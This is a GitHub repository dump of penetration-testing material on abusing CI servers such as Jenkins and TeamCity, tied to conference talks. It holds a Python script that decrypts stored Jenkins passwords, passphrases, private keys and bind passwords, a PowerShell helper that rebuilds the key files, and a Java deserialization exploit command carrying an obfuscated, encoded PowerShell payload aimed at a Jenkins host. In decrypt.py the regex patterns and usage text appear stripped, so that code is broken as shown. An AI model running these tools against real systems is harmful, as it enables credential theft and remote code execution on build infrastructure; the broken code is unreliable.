├── CHANGELOG.txt ├── Continuous_Intrusion.pdf ├── ConvertFrom-Bytes.ps1 ├── LICENSE ├── README.md ├── Screens ├── Go_Command_ExecEdit Job - Go.png ├── Go_Remove_Security.png ├── Go_command_exec_result.png ├── Jenkins_Command_Exec.png ├── Jenkins_Decrypt_Creds.png ├── Jenkins_Decrypted_Creds.png ├── Jenkins_Public_Msg.png ├── Jenkins_Public_Root.png ├── Jenkins_Unserialize.png ├── TeamCity_BuildLog_Creds.png ├── TeamCity_BuildLog_SQLCreds.png ├── Teamcity_SSHKeys.png ├── Teamcity_Script_Exec.png └── Teamcity_SuperUser.png ├── decrypt.py └── unserialize_jenkins.txt /CHANGELOG.txt: -------------------------------------------------------------------------------- 1 | 11/12/2016 2 | - Updated decrypt.py to add support for decrypting AD passwords from config.xml 3 | 4 | 22/11/2016 5 | - Updated decrypt.py for Jenkins 2.x 6 | - Changed TextToEXE to ConvertFrom-Bytes -------------------------------------------------------------------------------- /Continuous_Intrusion.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Continuous_Intrusion.pdf -------------------------------------------------------------------------------- /ConvertFrom-Bytes.ps1: -------------------------------------------------------------------------------- 1 | function ConvertFrom-Bytes 2 | { 3 | <# 4 | .SYNOPSIS 5 | Script to convert master.key and hudson.util.secret from bytes format to file. 6 | 7 | .DESCRIPTION 8 | Script to convert master.key and hudson.util.secret from bytes format to file. 9 | This is a technqiue to decrypt credentials and secrets stored with Jenkins. The technique is detailed 10 | here: http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html 11 | 12 | .PARAMETER ByteFile 13 | Path to the file where bytes for one of the files are saved. 14 | 15 | .PARAMETER KeyFile 16 | Path where the key created. 17 | 18 | .EXAMPLE 19 | PS > ConvertFrom-Bytes -ByteFile C:\ContinuousIntrusion\master.txt -KeyFile C:\ContinuousIntrusion\master.key 20 | Use above command to convert bytes of master.key back to the file. 21 | 22 | .EXAMPLE 23 | PS > ConvertFrom-Bytes -ByteFile C:\ContinuousIntrusion\hudson.util.Secret.txt -KeyFile C:\ContinuousIntrusion\hudson.util.Secret 24 | Use above command to convert bytes of hudson.util.Secret back to the file. 25 | 26 | 27 | .LINK 28 | http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html 29 | https://github.com/samratashok/nishang 30 | #> 31 | [CmdletBinding()] Param ( 32 | [Parameter(Position = 0, Mandatory = $True)] 33 | [String] 34 | $ByteFile, 35 | 36 | [Parameter(Position = 1, Mandatory = $True)] 37 | [String]$KeyFile 38 | ) 39 | 40 | [String]$hexdump = get-content -path "$ByteFile" 41 | [Byte[]] $temp = $hexdump -split ' ' 42 | [System.IO.File]::WriteAllBytes($KeyFile, $temp) 43 | Write-Output "File written to $KeyFile" 44 | } 45 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 Nikhil "SamratAshok" Mittal 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ContinuousIntrusion 2 | Material related to my talks at various conferences on using Continuous Integration tools (Jenkins, Teamcity, Go, Hudson, CruisControl) for penetration testing 3 | 4 | I did a Week of Continuous Intrusion to highlight security issues in widely used CI Tools: 5 | 6 | Day 1 - Jenkins (and Hudson) - http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html 7 | 8 | Day 2 - TeamCity - http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-2.html 9 | 10 | Day 3 - Go and CruiseControl - http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-3.html 11 | 12 | Day 4 - Common Abuse Set, Lateral Movement and Post Exploitation - http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-4.html 13 | 14 | Day 5 - Defense and other discussion - http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-5.html 15 | 16 | 17 | -------------------------------------------------------------------------------- /Screens/Go_Command_ExecEdit Job - Go.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Go_Command_ExecEdit Job - Go.png -------------------------------------------------------------------------------- /Screens/Go_Remove_Security.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Go_Remove_Security.png -------------------------------------------------------------------------------- /Screens/Go_command_exec_result.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Go_command_exec_result.png -------------------------------------------------------------------------------- /Screens/Jenkins_Command_Exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Jenkins_Command_Exec.png -------------------------------------------------------------------------------- /Screens/Jenkins_Decrypt_Creds.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Jenkins_Decrypt_Creds.png -------------------------------------------------------------------------------- /Screens/Jenkins_Decrypted_Creds.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Jenkins_Decrypted_Creds.png -------------------------------------------------------------------------------- /Screens/Jenkins_Public_Msg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Jenkins_Public_Msg.png -------------------------------------------------------------------------------- /Screens/Jenkins_Public_Root.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Jenkins_Public_Root.png -------------------------------------------------------------------------------- /Screens/Jenkins_Unserialize.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Jenkins_Unserialize.png -------------------------------------------------------------------------------- /Screens/TeamCity_BuildLog_Creds.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/TeamCity_BuildLog_Creds.png -------------------------------------------------------------------------------- /Screens/TeamCity_BuildLog_SQLCreds.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/TeamCity_BuildLog_SQLCreds.png -------------------------------------------------------------------------------- /Screens/Teamcity_SSHKeys.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Teamcity_SSHKeys.png -------------------------------------------------------------------------------- /Screens/Teamcity_Script_Exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Teamcity_Script_Exec.png -------------------------------------------------------------------------------- /Screens/Teamcity_SuperUser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/samratashok/ContinuousIntrusion/c12f8ce113b1141d3d4647f2de20f943906973e8/Screens/Teamcity_SuperUser.png -------------------------------------------------------------------------------- /decrypt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import re 4 | import sys 5 | import base64 6 | from hashlib import sha256 7 | from binascii import hexlify, unhexlify 8 | from Crypto.Cipher import AES 9 | 10 | MAGIC = "::::MAGIC::::" 11 | 12 | def usage(): 13 | print "./decrypt.py " 14 | sys.exit(0) 15 | 16 | def main(): 17 | if len(sys.argv) != 4: 18 | usage() 19 | 20 | master_key = open(sys.argv[1]).read() 21 | hudson_secret_key = open(sys.argv[2], 'rb').read() 22 | 23 | hashed_master_key = sha256(master_key).digest()[:16] 24 | o = AES.new(hashed_master_key, AES.MODE_ECB) 25 | x = o.decrypt(hudson_secret_key) 26 | assert MAGIC in x 27 | 28 | k = x[:-16] 29 | k = k[:16] 30 | credentials = open(sys.argv[3]).read() 31 | passwords = re.findall(r'(.*?)', credentials) 32 | 33 | for password in passwords: 34 | p = base64.decodestring(password) 35 | o = AES.new(k, AES.MODE_ECB) 36 | x = o.decrypt(p) 37 | assert MAGIC in x 38 | print re.findall('(.*)' + MAGIC, x)[0] 39 | 40 | passphrases = re.findall(r'(.*?)', credentials) 41 | for passphrase in passphrases: 42 | p = base64.decodestring(passphrase) 43 | o = AES.new(k, AES.MODE_ECB) 44 | x = o.decrypt(p) 45 | assert MAGIC in x 46 | print re.findall('(.*)' + MAGIC, x)[0] 47 | 48 | privatekeys = re.findall(r'(.*?)', credentials) 49 | for privatekey in privatekeys: 50 | p = base64.decodestring(privatekey) 51 | o = AES.new(k, AES.MODE_ECB) 52 | x = o.decrypt(p) 53 | print x 54 | assert MAGIC in x 55 | print re.findall('(.*)' + MAGIC, x)[0] 56 | 57 | bindpasswords = re.findall(r'(.*?)', credentials) 58 | for bindpassword in bindpasswords: 59 | p = base64.decodestring(bindpassword) 60 | o = AES.new(k, AES.MODE_ECB) 61 | x = o.decrypt(p) 62 | assert MAGIC in x 63 | print re.findall('(.*)' + MAGIC, x)[0] 64 | 65 | if __name__ == '__main__': 66 | main() 67 | 68 | -------------------------------------------------------------------------------- /unserialize_jenkins.txt: -------------------------------------------------------------------------------- 1 | java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'powershell.exe -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVABaAEYAZABhADgASQB3AEYASQBiAHYAQgAvAHMAUABoADkASwBOAGgATgBuAFEAMQBnADgAMgB5ADQAUwB0AGIAQwBJAE0AbABWAFgAWQBoAFgAZwBSADIANABQAHQAcgBGAFgAcwBFAFIAWAAxAHYAeQA5AHAAYgBlAGQAVgBEAHUASAA5AGUARQA1AGkAaABtAG0AQwBHAGMARQByAEQASABGAHYAagBlAGEALwBHAEIASQBFAHgANQB4AHcASgBZAFoASQBJAGwAaQBIAFMANgBSAGMAVABQAHkAeABYAHkAaQBaADQAYgB5ADQAdwB1AGsAOABDADcAZABwAEMAOABkAG8AdABGAHAATgA3AHAAawA1AGIAVgBHAHUAVgBJAHgAWgBCAG8AbwArAFUAbABEAGMATQBlADUATgA1ADAAZgBDADYAVwB4AG0ANgBqAE4AWABJAGwAdQBJAFQAcgB2AGQAYgBKADgAZgBUAHYAYgBGADIAOABkAEoAaQBvAHkAWgBpAGIAYQBYAFEAZQBJAGIAWgBjAFIASwBmAFEAUABzAEIAcABTAGoAKwBNAEoAcwBRAFQASABuAFkARwBVAEkATgBqADkANQBaAGkAUgBKAEsAaAArADcAdwBiAGMAbQB4AHcAMABPADUAUQBxAHIAUgBTAFoANABJAFAARQBXACsASQBQAEIAUgB4AGEAdQBvAHkAUgBiADgAQwB1AGYARwBxAHMAVwBYAFoATABvAFQAVABDAEwANQBqAEoAYwA2AHQAQQBFAEQAMQBBADIAdQBMADEASABCADgANAB3ADIAcABGAFYAMgB1AEIARwA2AGsASgBCAFgAaABtAGYAdwBCAGcASABZAEsAaQBUAGIAZgBZAFIARgAyAE4ASgBzAGIANwBzAGcAWABIADEAcQBFAEkAZABQAHkAVQBOAGgAbABlAG0AVwBiAGQAYgBNAEIAWgBzADcANQBxAEoALwBUAGYAVQBUAHkAeAArAHQAZwBrAGgAcQAzAE0AVQBkAHoAMQBYAHoAMQBOAHIAUAA5AE4AZABIAGoATgArADgAYQBwAGYAOABkAE4AMQBqAG8AegBmADMALwAwAEIAJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==' > payload.out 2 | 3 | python jenkins_exploit.py 192.168.230.125 8080 payload.out --------------------------------------------------------------------------------